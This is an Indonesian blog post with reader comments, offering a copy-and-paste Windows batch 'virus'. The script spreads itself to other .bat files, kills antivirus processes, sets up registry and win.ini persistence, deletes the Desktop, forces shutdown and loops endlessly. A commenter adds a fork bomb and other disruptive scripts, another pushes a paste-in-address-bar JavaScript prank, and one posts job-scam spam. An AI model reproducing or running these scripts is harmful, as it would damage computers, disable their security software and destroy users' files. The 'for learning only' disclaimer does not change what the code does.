Oleh: Hendra | 6 Mei 2011

membuat virus sederhana melalui notepad

Sudah lama nih saya ga posting karena banyak kesibukan saya yang berturut-turut dan banyak tugas-tugas yang harus diselesaikan. Dan saya merasa kangen nih sama sobat-sobat blogger. Nah, kali ini saya ingin berbagi sama sobat-sobat blogger walau pun sedikit melenceng dari biasanya, hehee..

Kita bisa bikin virus yang sederhana melalui notepad. Sobat Cuma copy aza scribe di bawah ini ke dalam notepad dan setelah itu save deng an ekstensi  *.bat ( cotoh: virus sederhana.bat ).

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”not responding, shutdown please”
cls
:Morphix
start %0
goto Morphix

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Kira-kira virus batch ini beken pada tahun 90-an tapi sekarang ini jarang di temukan berkeliaran. saya minta ma’af karena masih banyak lagi kekurangannya blog & postingan saya.

terima kasih banyak sudah berkunjung. semoga bermanfaat.

*DILARANG KERAS MENYALAH GUNAKAN SCRIBE INI karena ini hanya bertujuan sebagai pembelajaran saja

About these ads

Responses

  1. NUMPANG INFO YA BOS… bila tidak berkenan silakan dihapus:-)

    LOWONGAN KERJA GAJI RP 3 JUTA HINGGA 15 JUTA PER MINGGU

    1. Perusahaan ODAP (Online Based Data Assignment Program)
    2. Membutuhkan 200 Karyawan Untuk Semua Golongan Individu (SMU, Kuliah, Sarjana, karyawan dll yang memilki koneksi internet. Dapat dikerjakan dirumah, disekolah, atau dikantor.
    3. Dengan penawaran GAJI POKOK 2 JUTA/Bulan Dan Potensi penghasilan hingga Rp3 Juta sampai Rp15 Juta/Minggu.
    4. Jenis Pekerjaan ENTRY DATA(memasukkan data) per data Rp10rb rupiah, bila anda sanggup mengentry hingga 50 data perhari berarti nilai GAJI anda Rp10rbx50=Rp500rb/HARI, bila dalam 1bulan=Rp500rbx30hari=Rp15Juta/bulan
    5. Kami berikan langsung 200ribu didepan untuk menambah semangat kerja anda
    6. Kirim nama lengkap anda & alamat Email anda MELALUI WEBSITE Kami, info dan petunjuk kerja selengkapnya kami kirim via Email >> http://lowonganterbaik2011.blogspot.com/

    • terima kasih infonya.

  2. hahaha,,, masalah virus saya jerra kena 2 kali buatan anak smp, biar virus buatan ringan tp, tangguh… pula

    • Siapa Bri ? :D

  3. posting kok cara bikin virus, kenapa gak sekalian cara bikin bom, siapa tahu ada yang coba

    • ma’af pak, ini hanya virus sederhana saja. virus ini mudah saja dibasminya.
      saya ingat kata-kata orang dulu: pengalaman adalah guru kita. kita bisa belajar dari pengalaman kita atau orang lain untuk menjadi yang lebih baik lagi. seperti yang dikutip dari slogan blog saya,,hee..
      “Belajarlah dari suatu kegagalan dan Jadilah Jiwa yang lebih Baik Lagi”

  4. wah, awas jangan sampai ditaruh ditempatku, kalau sampai ditaruh tak basmi sama orangnya ……..

    • Entar tak ajarin bikin anti virusnya, hee..

  5. boleh dicoba jg tuch ilmunya..

    • tapi ingat jangan disalah gunakan karena itu sebagai bahan pembelajaran untuk mengetahui cara kerja virus.

  6. Permisi ? Numpang Nitip Komentar Boleh Nggak ? :D

    Banyak Cara Untuk Membuat VIRUS DENGAN NOTEPAD/WORDPAD, tetapi di sini kita akan memcoba untuk bisa menemukan kelemahan Dari Windows biasanya saya bikin itu saya mencoba berbagai macam Variasi Format contohnya BAT, VBS Dll ?

    Saya Dapat Informasi Juga dari seorang guru kalau kelemahan windows itu biasanya Menggunakan ( .INI )…di coba ajah misalnya BOOT.INI, WINDOWS/WIN.INI dll ? Makasih, akalau nggak berkenan komentarnya silahkan di Hapus ajah ?

    • boleh, silahkan.
      kalau virus yang menyerang ke windowsnya, dari dulu hingga sekarang masih ada. tapi sekarang ini dikembangkan para pembuat virus, virus gak hanya menyerang windows tapi juga merusak file-file penting.
      mungkin kedepannya akan ada virus yang menyerang MBR (Master boot record) karena kalau itu broken, gak bisa diinstal OS lagi komputernya.

  7. Dulu gue pernah mau buat virus dengan cara kayak gini, tapi niat itu diurungkan, karna takut temen pada protes XD

    • ya..virusnya tuh digunakan untuk diri sendiri saja dan dipasangnya di komputer sendiri saja.

  8. wah tambah pinter aja nih anak. sukses ya sob.

    • saya masih bodoh mba’ makanya masih kuliah,he..
      amien, makasih ya.

  9. virus, oh virus… ni aku posting tentang obat silahkan klik disini

  10. hen, ni ada script bagus, silahkan pastekan di addres bar mu

    javascript: confirm(‘Anda Sedang belajar Javascript! Klik OK untuk melanjutkan’); alert(‘Klik OK sekali lagi!!??’);a=0;x=0;y=0;setInterval(“a+=.05;x=Math. cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)”,2);void(0);{ var inp = “B) !!!sesorp|nakit@mem kut|nu#]KO[#kilk areges & ekaf su|riV |is|ireb iNi tpircs faaM”; var outp = “”; for (i = 0; i <= inp.length; i++) {outp =inp.charAt (i) + outp ; } alert(outp) ;}; reverse

  11. hendra…. ternyata pekerjaan selain kulian bikin virus ya… hahahaha

    • He..
      Thanks mba’ udah berkunjung ditempat saya.

    • He..
      Thanks mba’ udah mampir ditempat saya.

  12. kalau di buka bb atau hp biasa hp nya jd rusak apa enggak

  13. he3…bisa aja nih…klu cm bwt pengalaman&sekedar tau aja,menurutku gpp..thanks infonya

  14. gila gw coba it’s work man tapi cara ngilanginnya gimana?

  15. Nice gan…
    Semoga sukses dgn ILMUnya tapi jgn d pake bwt ngawur y.. :)
    nih gue kasik deh smw script yg pernah gue cobain…

    1.
    @echo off
    :top
    md %random%
    goto top

    2.
    %0|%0
    3.
    @ECHO off
    :
    Begin
    msg * Lagi ngapain ?
    msg * Hayo buka apa ?
    msg * Nanti dimarahin ama mak loe
    msg * Makannya jangan sembrono !
    msg * minta bantuan gih sono !
    msg * Udah instal ulang aja !!!!
    msg * tit……………………….
    GOTO BEGIN
    4.
    Set oWMP = CreateObject
    (“WMPlayer.OCX.7″)
    Set colCDROMs =
    oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop

    TOLONG JGN D SALAH GUNAIN Y..
    JUST FOR STUDY :)

    • makasih sudah share ilmu ditempat ane gan.

  16. waaaaah buset, ane g kepikiran tuh gan bikin virus. hehehe. yang ane pikirin game melulu. jadi kepikiran game virus. hehehe.
    Kalo ngilangin virus om hendra gimana nih?


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Kategori

Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: